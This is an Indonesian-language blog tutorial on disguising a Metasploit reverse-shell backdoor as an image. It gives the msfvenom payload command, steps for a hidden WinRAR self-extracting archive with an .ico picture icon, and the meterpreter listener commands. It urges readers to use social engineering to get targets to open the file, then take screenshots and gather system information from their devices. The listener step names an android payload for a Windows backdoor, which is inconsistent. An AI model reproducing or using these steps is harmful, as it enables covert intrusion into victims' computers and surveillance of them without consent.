Cara menyisipkan backdoor ke gambar adalah salah satu usaha agar kita bisa memasukan backdoor ke perangakat korban tanpa diketahui. Teknik menyisipi gambar dengan playload sering disebut juga dengan steganografi.
Jika sebelumnya kita sudah belajar cara menyisipkan backdoor ke aplikasi yang terbilang cukup rumit. Di tutorial ini saya pastikan kamu akan bisa karena prosesnya cukup mudah.
Kamu hanya perlu membuat aplikasi backdoor dari metasploit termux, kemudian memasukannya kedalam file gambar. Selanjutnya tinggal mengatur agar gambar melakukan selft extracting.
Self extracting artinya saat ikon dari file ini di klik, secara otomatis file compress yang ada didalam akan langsung terekstrak dengan sendirinya.
Ikon file nya adalah gambar .Ico
file compress nya adalah gambar biasa dan backdoor.
Jadi saat gambar .ico di klik yang akan muncul adalah gambar biasa dan backdoor akan berjalan.
Pahamkan, cara kerja nya?
Namun sayangnya, gambar .Ico hanya support untuk windows (komputer). Jadi jika backdoor dalam bentuk gambar dikirimkan ke android tidak akan berpengaruh apa-apa. Dan tidak bisa untuk melakukan sadap whatsapp termux.
Oke, sekarang mari kita langsung ke tutorialnya saja. untuk langkah-langkahnya silahkan kalian ikuti dibawah ini:
Cara Menyisipkan Backdoor Ke Gambar Menggunakan Metasploit
1. Buat backdoor di metasploit
Silahkan jalankan metasploit yang sudah terinstal dengan menuliskan perintah berikut:
msfconsole
Selanjutnya masukan lagi perintah dibawah ini untuk langsung membuat backdoor:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.245 LPORT=4444 -f exe > virus.exe
# Virus.exe bisa kalian ubah menjadi nama lain, asalkan belakang nya tetap .exe.
# LHOST ganti dengan IP address kalian.
# LPORT sesuaikan saja.
Setelah backdoor berhasil dibuat, pindahkan ke penyimpanan internal.
2. Convert gambar menjadi .Ico
Kalian bisa memanfaatkan website http://icoconvert.com/
Langsung saja pada halaman awal website, upload gambar yang ingin disisipi backdoor.

Selanjutnya tekan convert .ico dan download hasil convert nya.

3. Compress gambar dan backdoor dengan ikon gambar.ico
Disini kita bisa menggunakan win rar, karena sudah ada opsi sfx (self extracting) archive nya.
Untuk panduannya silahkan kalian ikuti saja dengan gambar berikut.
- Tandai file backdoor dan gambar biasa lalu compress
- Pada opsi general WinRAR pilih best dan centang create sfx archive dan tekan ok
- Geser ke menu advance dan pilih sfx option
- Pilih lagi menu setup dan pada kotak run after extraction tuliskan nama file backdoor dan file gambar biasa lalu ok
- Kemudian geser ke menu text and icon dan pada kotak load sfx icon from the file pilih gambar .Ico hasil convert sebelumnya
- Selanjutnya geser lagi ke menu modes dan pilih opsi hide all
Sampai disini backdoor sudah berhasil dimasukkan kedalam gambar.
Langkah selanjutnya tinggal mengirimkan backdoor ke target kalian.
Bagaimana cara kirim backdoor ke target?
Terserah kalian saja, yang penting bisa ada di perangkat target dan pastikan target juga membukanya.
Sebagai tips! Gunakan social engineering agar kalian bisa dengan mudah mengirimkan file gambar tersebut.
Apa yang harus dilakukan setelah gambar berisi backdoor ada di perangkat target?
Kalian tinggal menghubungkan backdoor tersebut dengan metasploit.
Caranya masuk ke metasploit terlebih dahulu dengan perintah berikut.
msfconsole
Selanjutnya masukan lagi perintah berikut ini.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.43.245 set lport 4444 exploit
LHOST dan LPORT sesuaikan dengan yang kalian gunakan sebelumnya saat membuat backdoor.
Nah, jika sudah muncul meterpreter di metasploit kalian, itu artinya backdoor sudah terhubung.

Selanjutnya tinggal memasukkan perintah apa yang kalian inginkan.
Misalnya untuk mengetahui perangkat apa yang digunakan terget, kalian bisa memasukkan perintah sysinfo
Dan jika ingin melakukan screenshot perangkat target, gunakan perintah screenshot.
Untuk perintah Exploit lainnya, silahkan lihat di metasploit help. Atau langsung cari tau di website resminya di metasploit.com
Oke sekarang kita sudah belajar cara menyisipkan backdoor ke gambar, sangat mudah dipahami kan? sekaran giliran kalian untuk mempraktekkannya.
Apabila ada kesulitan, silahkan tanyakan saja melalui kolom komentar. Terimakasih sudah membaca.
Tinggalkan Balasan